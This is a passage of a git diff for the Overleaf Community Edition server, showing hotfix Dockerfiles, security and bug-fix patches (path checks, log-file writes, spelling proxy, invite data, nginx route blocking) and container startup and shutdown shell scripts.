export const loadMathJax = async (options?: { + .findID('Renderer') + .disable() + }, ++ ready() { ++ window.MathJax.startup.defaultReady() ++ const safe = window.MathJax.startup.document.safe ++ safe.filterAttributes.set('fontfamily', 'filterFontFamily') ++ safe.filterMethods.filterFontFamily = ( ++ _safe: any, ++ family: string ++ ) => family.split(/;/)[0] ++ }, + }, + } diff --git a/server-ce/hotfix/5.0.6/Dockerfile b/server-ce/hotfix/5.0.6/Dockerfile new file mode 100644 index 0000000..1e993dd --- /dev/null +++ b/server-ce/hotfix/5.0.6/Dockerfile @@ -0,0 +1,3 @@ +FROM sharelatex/sharelatex:5.0.5 + +# Server Pro only hotfix diff --git a/server-ce/hotfix/5.0.7/Dockerfile b/server-ce/hotfix/5.0.7/Dockerfile new file mode 100644 index 0000000..cb9c227 --- /dev/null +++ b/server-ce/hotfix/5.0.7/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:5.0.6 + +COPY pr_19293.patch . +RUN patch -p1 < pr_19293.patch && rm pr_19293.patch + +COPY pr_19296.patch . +RUN patch -p1 < pr_19296.patch && rm pr_19296.patch + +COPY pr_19297.patch . +RUN patch -p1 < pr_19297.patch && rm pr_19297.patch + +COPY pr_19071.patch . +RUN patch -p1 < pr_19071.patch && rm pr_19071.patch diff --git a/server-ce/hotfix/5.0.7/pr_19071.patch b/server-ce/hotfix/5.0.7/pr_19071.patch new file mode 100644 index 0000000..2e925e8 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19071.patch @@ -0,0 +1,37 @@ +--- a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js ++++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js +@@ -7,13 +7,16 @@ const UserGetter = require('../User/UserGetter') + const ProjectGetter = require('../Project/ProjectGetter') + const Crypto = require('crypto') + const NotificationsBuilder = require('../Notifications/NotificationsBuilder') ++const _ = require('lodash') + + const randomBytes = promisify(Crypto.randomBytes) + + const CollaboratorsInviteHandler = { + async getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') +- const invites = await ProjectInvite.find({ projectId }).exec() ++ const invites = await ProjectInvite.find({ projectId }) ++ .select('_id email sendingUserId projectId privileges createdAt expires') ++ .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' +@@ -101,7 +104,15 @@ const CollaboratorsInviteHandler = { + logger.err({ err, projectId, email }, 'error sending messages for invite') + }) + +- return invite ++ return _.pick(invite.toObject(), [ ++ 'email', ++ 'sendingUserId', ++ 'projectId', ++ 'privileges', ++ '_id', ++ 'createdAt', ++ 'expires', ++ ]) + }, + + async revokeInvite(projectId, inviteId) { diff --git a/server-ce/hotfix/5.0.7/pr_19293.patch b/server-ce/hotfix/5.0.7/pr_19293.patch new file mode 100644 index 0000000..3a9c7d0 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19293.patch @@ -0,0 +1,17 @@ +--- a/services/clsi/app/js/StaticServerForbidSymlinks.js ++++ b/services/clsi/app/js/StaticServerForbidSymlinks.js +@@ -25,9 +25,13 @@ module.exports = ForbidSymlinks = function (staticFn, root, options) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log +- if ((result = path.match(/^\/?([a-zA-Z0-9_-]+)\/(.*)/))) { ++ if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] ++ if (path !== `/${projectId}/${file}`) { ++ logger.warn({ path }, 'unrecognized file request') ++ return res.sendStatus(404) ++ } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) diff --git a/server-ce/hotfix/5.0.7/pr_19296.patch b/server-ce/hotfix/5.0.7/pr_19296.patch new file mode 100644 index 0000000..578c488 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19296.patch @@ -0,0 +1,22 @@ +--- a/services/clsi/app/js/LatexRunner.js ++++ b/services/clsi/app/js/LatexRunner.js +@@ -110,11 +110,14 @@ function _writeLogOutput(projectId, directory, output, callback) { + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { +- fs.writeFile(file, content, err => { +- if (err) { +- logger.error({ err, projectId, file }, 'error writing log file') // don't fail on error +- } +- cb() ++ fs.unlink(file, () => { ++ fs.writeFile(file, content, { flag: 'wx' }, err => { ++ if (err) { ++ // don't fail on error ++ logger.error({ err, projectId, file }, 'error writing log file') ++ } ++ cb() ++ }) + }) + } else { + cb() diff --git a/server-ce/hotfix/5.0.7/pr_19297.patch b/server-ce/hotfix/5.0.7/pr_19297.patch new file mode 100644 index 0000000..2e46183 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19297.patch @@ -0,0 +1,70 @@ +--- a/services/web/app/src/Features/Spelling/SpellingController.js ++++ b/services/web/app/src/Features/Spelling/SpellingController.js +@@ -28,39 +28,35 @@ module.exports = { + }) + }, + +- proxyRequestToSpellingApi(req, res) { ++ proxyCheckRequestToSpellingApi(req, res) { + const { language } = req.body + +- let url = req.url.slice('/spelling'.length) +- +- if (url === '/check') { +- if (!language) { +- logger.error('"language" field should be included for spell checking') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!language) { ++ logger.error({}, '"language" field should be included for spell checking') ++ return res.status(422).json({ misspellings: [] }) ++ } + +- if (!languageCodeIsSupported(language)) { +- // this log statement can be changed to 'error' once projects with +- // unsupported languages are removed from the DB +- logger.debug({ language }, 'language not supported') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!languageCodeIsSupported(language)) { ++ // this log statement can be changed to 'error' once projects with ++ // unsupported languages are removed from the DB ++ logger.debug({ language }, 'language not supported') ++ return res.status(422).json({ misspellings: [] }) + } + + const userId = SessionManager.getLoggedInUserId(req.session) +- url = `/user/${userId}${url}` ++ const url = `${Settings.apis.spelling.url}/user/${userId}/check` + req.headers.Host = Settings.apis.spelling.host + return request({ +- url: Settings.apis.spelling.url + url, +- method: req.method, ++ url, ++ method: 'POST', + headers: req.headers, + json: req.body, + timeout: TEN_SECONDS, + }) + .on('error', function (error) { +- logger.error({ err: error }, 'Spelling API error') ++ logger.error({ err: error }, 'Spelling Check API error') + return res.status(500).end() + }) + .pipe(res) + }, +-} ++} +\ No newline at end of file + +--- a/services/web/app/src/router.js ++++ b/services/web/app/src/router.js +@@ -1083,7 +1083,7 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + webRouter.post( + '/spelling/check', + AuthenticationController.requireLogin(), +- SpellingController.proxyRequestToSpellingApi ++ SpellingController.proxyCheckRequestToSpellingApi + ) + webRouter.post( + '/spelling/learn', diff --git a/server-ce/hotfix/5.1.1/Dockerfile b/server-ce/hotfix/5.1.1/Dockerfile new file mode 100644 index 0000000..5936808 --- /dev/null +++ b/server-ce/hotfix/5.1.1/Dockerfile @@ -0,0 +1,20 @@ +FROM sharelatex/sharelatex:5.1.0 + +# Confirmation email fix +COPY pr_19676.patch . +RUN patch -p1 < pr_19676.patch && rm pr_19676.patch + +# Fix crash on on invalid URLs +COPY pr_19612.patch . +RUN patch -p1 < pr_19612.patch && rm pr_19612.patch + +# Remove Editor Resources check from launchpad +COPY pr_19543.patch . +RUN patch -p1 < pr_19543.patch && rm pr_19543.patch + +COPY pr_19550.patch . +RUN patch -p1 < pr_19550.patch && rm pr_19550.patch + +COPY is_19575.patch /etc/nginx/sites-enabled/ +RUN cd /etc/nginx/sites-enabled && patch -p0 < is_19575.patch && rm is_19575.patch + diff --git a/server-ce/hotfix/5.1.1/is_19575.patch b/server-ce/hotfix/5.1.1/is_19575.patch new file mode 100644 index 0000000..ca78ae5 --- /dev/null +++ b/server-ce/hotfix/5.1.1/is_19575.patch @@ -0,0 +1,19 @@ +--- overleaf.conf ++++ overleaf.conf +@@ -67,6 +67,16 @@ server { + proxy_http_version 1.1; + } + ++ # block external access to metrics ++ location ~* ^/metrics/?$ { ++ return 404 'Not found'; ++ } ++ ++ # block external access to all health checks /health_check, /health_check/full, etc ++ location ~* ^/health_check { ++ return 404 'Not found'; ++ } ++ + # Load any extra configuration for this vhost + include /etc/nginx/vhost-extras/overleaf/*.conf; + } diff --git a/server-ce/hotfix/5.1.1/pr_19543.patch b/server-ce/hotfix/5.1.1/pr_19543.patch new file mode 100644 index 0000000..77e2b11 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19543.patch @@ -0,0 +1,30 @@ +diff --git a/services/web/locales/en.json b/services/web/locales/en.json +index a953a01a1d7..13e20b37279 100644 +--- a/services/web/locales/en.json ++++ b/services/web/locales/en.json +@@ -519,7 +519,6 @@ + "editor_disconected_click_to_reconnect": "Editor disconnected, click anywhere to reconnect.", + "editor_limit_exceeded_in_this_project": "Too many editors in this project", + "editor_only_hide_pdf": "Editor only <0>(hide PDF)", +- "editor_resources": "Editor Resources", + "editor_theme": "Editor theme", + "educational_discount_applied": "40% educational discount applied!", + "educational_discount_available_for_groups_of_ten_or_more": "The educational discount is available for groups of 10 or more", +diff --git a/services/web/modules/launchpad/app/views/launchpad.pug b/services/web/modules/launchpad/app/views/launchpad.pug +index c478fe7b649..28d3ff8fc83 100644 +--- a/services/web/modules/launchpad/app/views/launchpad.pug ++++ b/services/web/modules/launchpad/app/views/launchpad.pug +@@ -166,13 +166,6 @@ block content + + h2 #{translate('status_checks')} + +- +- .row.row-spaced-small +- .col-sm-5 +- | #{translate('editor_resources')} +- .col-sm-7 +- +launchpad-check('ide') +- + + .row.row-spaced-small + .col-sm-5 diff --git a/server-ce/hotfix/5.1.1/pr_19550.patch b/server-ce/hotfix/5.1.1/pr_19550.patch new file mode 100644 index 0000000..f52a5dd --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19550.patch @@ -0,0 +1,59 @@ +diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js +index 28f4f380d3d..abc11c59a48 100644 +--- a/services/web/app/src/infrastructure/CSP.js ++++ b/services/web/app/src/infrastructure/CSP.js +@@ -6,6 +6,7 @@ module.exports = function ({ + reportPercentage, + reportOnly = false, + exclude = [], ++ viewDirectives = {}, + }) { + const header = reportOnly + ? 'Content-Security-Policy-Report-Only' +@@ -33,7 +34,12 @@ module.exports = function ({ + + res.locals.scriptNonce = scriptNonce + +- const policy = buildViewPolicy(scriptNonce, reportPercentage, reportUri) ++ const policy = buildViewPolicy( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives[view] ++ ) + + // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy + +@@ -68,11 +74,17 @@ const buildDefaultPolicy = (reportUri, styleSrc) => { + return directives.join('; ') + } + +-const buildViewPolicy = (scriptNonce, reportPercentage, reportUri) => { ++const buildViewPolicy = ( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives ++) => { + const directives = [ + `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources + `object-src 'none'`, // forbid loading an "object" element + `base-uri 'none'`, // forbid setting a "base" element ++ ...(viewDirectives ?? []), + ] + + if (reportUri) { +diff --git a/services/web/config/settings.defaults.js b/services/web/config/settings.defaults.js +index cad13ab8156..ab738babdcd 100644 +--- a/services/web/config/settings.defaults.js ++++ b/services/web/config/settings.defaults.js +@@ -911,6 +911,9 @@ module.exports = { + reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0, + reportUri: process.env.CSP_REPORT_URI, + exclude: [], ++ viewDirectives: { ++ 'app/views/project/ide-react': [`img-src 'self' data: blob:`], ++ }, + }, + + unsupportedBrowsers: { diff --git a/server-ce/hotfix/5.1.1/pr_19612.patch b/server-ce/hotfix/5.1.1/pr_19612.patch new file mode 100644 index 0000000..3f46f92 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19612.patch @@ -0,0 +1,46 @@ +diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.js b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +index 278f04bb767..ff074cfa816 100644 +--- a/services/web/app/src/Features/HealthCheck/HealthCheckController.js ++++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +@@ -45,6 +45,10 @@ module.exports = { + logger.err({ err }, 'failed api redis health check') + return res.sendStatus(500) + } ++ if (!settings.smokeTest.userId) { ++ logger.err({}, 'smokeTest.userId is undefined in health check') ++ return res.sendStatus(404) ++ } + UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => { + if (err) { + logger.err({ err }, 'failed api mongo health check') +diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js +index 5f14977d3a3..2e9ed4f1ebb 100644 +--- a/services/web/app/src/infrastructure/ExpressLocals.js ++++ b/services/web/app/src/infrastructure/ExpressLocals.js +@@ -11,6 +11,7 @@ const Features = require('./Features') + const SessionManager = require('../Features/Authentication/SessionManager') + const PackageVersions = require('./PackageVersions') + const Modules = require('./Modules') ++const Errors = require('../Features/Errors/Errors') + const { + canRedirectToAdminDomain, + hasAdminAccess, +@@ -236,10 +237,14 @@ module.exports = function (webRouter, privateApiRouter, publicApiRouter) { + + // Don't include the query string parameters, otherwise Google + // treats ?nocdn=true as the canonical version +- const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) +- res.locals.currentUrl = parsedOriginalUrl.pathname +- res.locals.currentUrlWithQueryParams = +- parsedOriginalUrl.pathname + parsedOriginalUrl.search ++ try { ++ const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) ++ res.locals.currentUrl = parsedOriginalUrl.pathname ++ res.locals.currentUrlWithQueryParams = ++ parsedOriginalUrl.pathname + parsedOriginalUrl.search ++ } catch (err) { ++ return next(new Errors.InvalidError()) ++ } + res.locals.capitalize = function (string) { + if (string.length === 0) { + return '' diff --git a/server-ce/hotfix/5.1.1/pr_19676.patch b/server-ce/hotfix/5.1.1/pr_19676.patch new file mode 100644 index 0000000..287ee78 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19676.patch @@ -0,0 +1,26 @@ +diff --git a/services/web/app/src/Features/Email/EmailBuilder.js b/services/web/app/src/Features/Email/EmailBuilder.js +index 46d014a8e14..d839d67f634 100644 +--- a/services/web/app/src/Features/Email/EmailBuilder.js ++++ b/services/web/app/src/Features/Email/EmailBuilder.js +@@ -234,7 +234,7 @@ templates.confirmEmail = ctaTemplate({ + }, + secondaryMessage() { + return [ +- 'If you did not request this, please let us know at support@overleaf.com.', ++ `If you did not request this, please let us know at ${settings.adminEmail}.`, + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, +diff --git a/services/web/app/src/Features/User/UserRegistrationHandler.js b/services/web/app/src/Features/User/UserRegistrationHandler.js +index 2802fdc81c5..02c52f73fd2 100644 +--- a/services/web/app/src/Features/User/UserRegistrationHandler.js ++++ b/services/web/app/src/Features/User/UserRegistrationHandler.js +@@ -113,7 +113,7 @@ const UserRegistrationHandler = { + + const setNewPasswordUrl = `${settings.siteUrl}/user/activate?token=${token}&user_id=${user._id}` + +- EmailHandler.promises ++ await EmailHandler.promises + .sendEmail('registered', { + to: user.email, + setNewPasswordUrl, diff --git a/server-ce/hotfix/5.2.1/Dockerfile b/server-ce/hotfix/5.2.1/Dockerfile new file mode 100644 index 0000000..63cc952 --- /dev/null +++ b/server-ce/hotfix/5.2.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:5.2.0 + +# Subnet rate limiter fix +COPY pr_21327.patch / +RUN cd / && patch -p0 < pr_21327.patch && rm pr_21327.patch diff --git a/server-ce/hotfix/5.2.1/pr_21327.patch b/server-ce/hotfix/5.2.1/pr_21327.patch new file mode 100644 index 0000000..f2e49df --- /dev/null +++ b/server-ce/hotfix/5.2.1/pr_21327.patch @@ -0,0 +1,36 @@ +--- overleaf/services/web/app/src/infrastructure/RateLimiter.js ++++ overleaf/services/web/app/src/infrastructure/RateLimiter.js +@@ -39,7 +39,7 @@ class RateLimiter { + keyPrefix: `rate-limit:${name}`, + storeClient: rclient, + }) +- if (opts.subnetPoints) { ++ if (opts.subnetPoints && !Settings.rateLimit?.subnetRateLimiterDisabled) { + this._subnetRateLimiter = new RateLimiterFlexible.RateLimiterRedis({ + ...opts, + points: opts.subnetPoints, +--- overleaf/services/web/config/settings.defaults.js ++++ overleaf/services/web/config/settings.defaults.js +@@ -777,6 +777,8 @@ module.exports = { + reloadModuleViewsOnEachRequest: process.env.NODE_ENV === 'development', + + rateLimit: { ++ subnetRateLimiterDisabled: ++ process.env.SUBNET_RATE_LIMITER_DISABLED === 'true', + autoCompile: { + everyone: process.env.RATE_LIMIT_AUTO_COMPILE_EVERYONE || 100, + standard: process.env.RATE_LIMIT_AUTO_COMPILE_STANDARD || 25, +--- etc/overleaf/settings.js ++++ etc/overleaf/settings.js +@@ -212,6 +212,11 @@ const settings = { + enabled: process.env.OVERLEAF_CSP_ENABLED !== 'false', + }, + ++ rateLimit: { ++ subnetRateLimiterDisabled: ++ process.env.SUBNET_RATE_LIMITER_DISABLED !== 'false', ++ }, ++ + // These credentials are used for authenticating api requests + // between services that may need to go over public channels + httpAuthUsers, diff --git a/server-ce/hotfix/5.3.1/Dockerfile b/server-ce/hotfix/5.3.1/Dockerfile new file mode 100644 index 0000000..ec0bef5 --- /dev/null +++ b/server-ce/hotfix/5.3.1/Dockerfile @@ -0,0 +1,14 @@ +FROM sharelatex/sharelatex:5.3.0 + +# Update copyright year +COPY pr_22950.patch . +RUN patch -p0 < pr_22950.patch && rm pr_22950.patch + + +# Update Mongoose +RUN npm install mongoose@^8.9.5 --save -w services/web \ + && npm install mongodb@6.12.0 --save \ + -w services/chat -w services/contacts -w services/docstore \ + -w services/history-v1 -w libraries/mongo-utils \ + && npm install mongodb@6.12.0 --save \ + && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1) diff --git a/server-ce/hotfix/5.3.1/pr_22950.patch b/server-ce/hotfix/5.3.1/pr_22950.patch new file mode 100644 index 0000000..cd066f9 --- /dev/null +++ b/server-ce/hotfix/5.3.1/pr_22950.patch @@ -0,0 +1,33 @@ +--- services/web/app/views/layout/thin-footer-bootstrap-5.pug ++++ services/web/app/views/layout/thin-footer-bootstrap-5.pug +@@ -7,7 +7,7 @@ footer.site-footer + if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static +- | © 2024 ++ | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + +--- services/web/app/views/layout/thin-footer.pug ++++ services/web/app/views/layout/thin-footer.pug +@@ -9,7 +9,7 @@ footer.site-footer + else if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static +- | © 2024 ++ | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + +--- services/web/frontend/js/features/ui/components/bootstrap-5/footer/thin-footer.tsx ++++ services/web/frontend/js/features/ui/components/bootstrap-5/footer/thin-footer.tsx +@@ -60,7 +60,7 @@ function ThinFooter({ + {showPoweredBy ? ( + <> +
  • +- {/* year of Server Pro release, static */}© 2024{' '} ++ {/* year of Server Pro release, static */}© 2025{' '} + + Powered by Overleaf + diff --git a/server-ce/hotfix/5.3.2/Dockerfile b/server-ce/hotfix/5.3.2/Dockerfile new file mode 100644 index 0000000..3a43371 --- /dev/null +++ b/server-ce/hotfix/5.3.2/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:5.3.1 diff --git a/server-ce/hotfix/5.3.3/Dockerfile b/server-ce/hotfix/5.3.3/Dockerfile new file mode 100644 index 0000000..034eafb --- /dev/null +++ b/server-ce/hotfix/5.3.3/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:5.3.2 diff --git a/server-ce/init_preshutdown_scripts/00_close_site b/server-ce/init_preshutdown_scripts/00_close_site new file mode 100755 index 0000000..ed5404f --- /dev/null +++ b/server-ce/init_preshutdown_scripts/00_close_site @@ -0,0 +1,34 @@ +#!/bin/sh + +. /etc/container_environment.sh +. /etc/overleaf/env.sh + +SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + +mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}" +echo "closed" > "${SITE_MAINTENANCE_FILE}" + +# status file is polled every 5 seconds +sleep 5 + +# giving a grace period of 5 seconds for users before disconnecting them and start shutting down +cd /overleaf/services/web && node scripts/disconnect_all_users.mjs --delay-in-seconds=5 >> /var/log/overleaf/web.log 2>&1 + +EXIT_CODE="$?" +if [ $EXIT_CODE -ne 0 ] +then + echo "scripts/disconnect_all_users.mjs failed with exit code $EXIT_CODE" + exit 1 +fi + +sleep 10 & +GIVE_EDITOR_10_SECONDS_TO_RELOAD=$! + +# wait for disconnection +while ! sv stop real-time-overleaf; do + sleep 1 +done + +wait $GIVE_EDITOR_10_SECONDS_TO_RELOAD + +exit 0 diff --git a/server-ce/init_preshutdown_scripts/01_flush_document_updater b/server-ce/init_preshutdown_scripts/01_flush_document_updater new file mode 100755 index 0000000..0900fe5 --- /dev/null +++ b/server-ce/init_preshutdown_scripts/01_flush_document_updater @@ -0,0 +1,15 @@ +#!/bin/sh + +. /etc/container_environment.sh +. /etc/overleaf/env.sh + +cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/overleaf/document-updater.log 2>&1 + +EXIT_CODE="$?" +if [ $EXIT_CODE -ne 0 ] +then + echo "document-updater/scripts/flush_all.js failed with exit code $EXIT_CODE" + exit 1 +fi + +exit 0 diff --git a/server-ce/init_preshutdown_scripts/02_flush_project_history b/server-ce/init_preshutdown_scripts/02_flush_project_history new file mode 100755 index 0000000..f8ac516 --- /dev/null +++ b/server-ce/init_preshutdown_scripts/02_flush_project_history @@ -0,0 +1,15 @@ +#!/bin/sh + +. /etc/container_environment.sh +. /etc/overleaf/env.sh + +cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/overleaf/project-history.log 2>&1 + +EXIT_CODE="$?" +if [ $EXIT_CODE -ne 0 ] +then + echo "project-history/scripts/flush_all.js failed with exit code $EXIT_CODE" + exit 1 +fi + +exit 0 diff --git a/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh b/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh new file mode 100755 index 0000000..6c501c7 --- /dev/null +++ b/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh @@ -0,0 +1,78 @@ +#!/bin/bash + +set -e + +POTENTIAL_OLD_PATHS=" +/etc/sharelatex +/var/lib/sharelatex +/var/log/sharelatex +" + +OLD_ITEMS="" +for path in ${POTENTIAL_OLD_PATHS}; do + if [[ -e "$path" ]]; then + OLD_ITEMS="$OLD_ITEMS $path" + fi +done + +if [[ "$OLD_ITEMS" == "" ]]; then + exit 0 +fi + +OLD_ITEMS=$(echo "$OLD_ITEMS" | xargs -n1 | sed 's/^/ - /') +N=$(echo "$OLD_ITEMS" | wc -l) +cat < /etc/overleaf + - /var/lib/sharelatex -> /var/lib/overleaf + - /var/log/sharelatex -> /var/log/overleaf + + Overleaf toolkit setups: + + github.com/overleaf/toolkit$ bin/upgrade + + + Legacy docker compose setups/Horizontal scaling setups: + + before: + + services: + sharelatex: + volumes: + - /my/docker-host/path:/var/lib/sharelatex + + after: + + services: + sharelatex: + volumes: + - /my/docker-host/path:/var/lib/overleaf + + + Other deployment methods: + + Adapt the docker compose example or get in touch with support. + + + Server Pro: Please update SANDBOXED_COMPILES_HOST_DIR if needed. + + + Refusing to startup, exiting in 10s. + +------------------------------------------------------------------------ +EOF + +sleep 10 +exit 101 diff --git a/server-ce/init_scripts/000_check_for_old_env_vars_5.sh b/server-ce/init_scripts/000_check_for_old_env_vars_5.sh new file mode 100755 index 0000000..2beb008 --- /dev/null +++ b/server-ce/init_scripts/000_check_for_old_env_vars_5.sh @@ -0,0 +1,56 @@ +#!/bin/bash + +set -e + +OLD_ITEMS=$(env | cut -d '=' -f1 | grep SHARELATEX | sed 's/^/ - /') + +if [[ "$OLD_ITEMS" == "" ]]; then + exit 0 +fi + +N=$(echo "$OLD_ITEMS" | wc -l) +cat < OVERLEAF_MONGO_URL, or + remove old entries from your configuration. + + You can use the following script for migrating your config. + + Overleaf toolkit setups: + + github.com/overleaf/toolkit$ bin/upgrade + github.com/overleaf/toolkit$ bin/rename-env-vars-5-0.sh + + + Legacy docker compose setups/Horizontal scaling setups: + + github.com/overleaf/overleaf$ git pull + github.com/overleaf/overleaf$ server-ce/bin/rename-env-vars-5-0.sh + + # When using a docker-compose.override.yml file (or other file name): + github.com/overleaf/overleaf$ server-ce/bin/rename-env-vars-5-0.sh docker-compose.override.yml + + + Other deployment methods: + + Try using the docker compose script or get in touch with support. + + + Refusing to startup, exiting in 10s. + +------------------------------------------------------------------------ +EOF + +sleep 10 +exit 101 diff --git a/server-ce/init_scripts/100_generate_secrets.sh b/server-ce/init_scripts/100_generate_secrets.sh new file mode 100755 index 0000000..ec7e846 --- /dev/null +++ b/server-ce/init_scripts/100_generate_secrets.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e -o pipefail + +# generate secrets and defines them as environment variables +# https://github.com/phusion/baseimage-docker#centrally-defining-your-own-environment-variables + +WEB_API_PASSWORD_FILE=/etc/container_environment/WEB_API_PASSWORD +STAGING_PASSWORD_FILE=/etc/container_environment/STAGING_PASSWORD # HTTP auth for history-v1 +V1_HISTORY_PASSWORD_FILE=/etc/container_environment/V1_HISTORY_PASSWORD +CRYPTO_RANDOM_FILE=/etc/container_environment/CRYPTO_RANDOM +OT_JWT_AUTH_KEY_FILE=/etc/container_environment/OT_JWT_AUTH_KEY + +generate_secret () { + dd if=/dev/urandom bs=1 count=32 2>/dev/null | base64 -w 0 | rev | cut -b 2- | rev | tr -d '\n+/' +} + +if [ ! -f "$WEB_API_PASSWORD_FILE" ] || + [ ! -f "$STAGING_PASSWORD_FILE" ] || + [ ! -f "$V1_HISTORY_PASSWORD_FILE" ] || + [ ! -f "$CRYPTO_RANDOM_FILE" ] || + [ ! -f "$OT_JWT_AUTH_KEY_FILE" ] +then + echo "generating random secrets" + + SECRET=$(generate_secret) + echo "${SECRET}" > ${WEB_API_PASSWORD_FILE} + + SECRET=$(generate_secret) + echo "${SECRET}" > ${STAGING_PASSWORD_FILE} + echo "${SECRET}" > ${V1_HISTORY_PASSWORD_FILE} + + SECRET=$(generate_secret) + echo "${SECRET}" > ${CRYPTO_RANDOM_FILE} + + SECRET=$(generate_secret) + echo "${SECRET}" > ${OT_JWT_AUTH_KEY_FILE} +fi + diff --git a/server-ce/init_scripts/100_make_overleaf_data_dirs.sh b/server-ce/init_scripts/100_make_overleaf_data_dirs.sh new file mode 100755 index 0000000..80b69eb --- /dev/null +++ b/server-ce/init_scripts/100_make_overleaf_data_dirs.sh @@ -0,0 +1,38 @@ +#!/bin/sh +set -e + +mkdir -p /var/lib/overleaf/data +chown www-data:www-data /var/lib/overleaf/data + +mkdir -p /var/lib/overleaf/data/user_files +chown www-data:www-data /var/lib/overleaf/data/user_files + +mkdir -p /var/lib/overleaf/data/compiles +chown www-data:www-data /var/lib/overleaf/data/compiles + +mkdir -p /var/lib/overleaf/data/output +chown www-data:www-data /var/lib/overleaf/data/output + +mkdir -p /var/lib/overleaf/data/cache +chown www-data:www-data /var/lib/overleaf/data/cache + +mkdir -p /var/lib/overleaf/data/template_files +chown www-data:www-data /var/lib/overleaf/data/template_files + +mkdir -p /var/lib/overleaf/data/history +chown www-data:www-data /var/lib/overleaf/data/history + +mkdir -p /var/lib/overleaf/tmp/projectHistories +chown www-data:www-data /var/lib/overleaf/tmp/projectHistories + +mkdir -p /var/lib/overleaf/tmp/dumpFolder +chown www-data:www-data /var/lib/overleaf/tmp/dumpFolder + +mkdir -p /var/lib/overleaf/tmp +chown www-data:www-data /var/lib/overleaf/tmp + +mkdir -p /var/lib/overleaf/tmp/uploads +chown www-data:www-data /var/lib/overleaf/tmp/uploads + +mkdir -p /var/lib/overleaf/tmp/dumpFolder +chown www-data:www-data /var/lib/overleaf/tmp/dumpFolder diff --git a/server-ce/init_scripts/100_restore_site_status.sh b/server-ce/init_scripts/100_restore_site_status.sh new file mode 100755 index 0000000..151d57c --- /dev/null +++ b/server-ce/init_scripts/100_restore_site_status.sh @@ -0,0 +1,12 @@ +#!/bin/bash + +set -e + +# pre-shutdown scripts close the site by overriding the content of SITE_MAINTENANCE_FILE, +# this script restores the original value on container restart +SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + +if [ -f "${SITE_MAINTENANCE_FILE_BAK}" ]; then + mv -f "${SITE_MAINTENANCE_FILE_BAK}" "${SITE_MAINTENANCE_FILE}" + rm -f "${SITE_MAINTENANCE_FILE_BAK}" +fi diff --git a/server-ce/init_scripts/100_set_docker_host_ipaddress.sh b/server-ce/init_scripts/100_set_docker_host_ipaddress.sh new file mode 100755 index 0000000..646b55a --- /dev/null +++ b/server-ce/init_scripts/100_set_docker_host_ipaddress.sh @@ -0,0 +1,5 @@ +#!/bin/bash +set -e -o pipefail + +# See the bottom of http://stackoverflow.com/questions/24319662/from-inside-of-a-docker-container-how-do-i-connect-to-the-localhost-of-the-mach +echo "$(route -n | awk '/UG[ \t]/{print $2}') dockerhost" >> /etc/hosts diff --git a/server-ce/init_scripts/200_nginx_config_template.sh b/server-ce/init_scripts/200_nginx_config_template.sh new file mode 100755 index 0000000..f570726 --- /dev/null +++ b/server-ce/init_scripts/200_nginx_config_template.sh @@ -0,0 +1,43 @@ +#!/bin/sh + +set -e + +## Generate nginx config files from templates, +## with environment variables substituted + +nginx_dir='/etc/nginx' +nginx_templates_dir="${nginx_dir}/templates" + +if ! [ -d "${nginx_templates_dir}" ]; then + echo "Nginx: no template directory found, 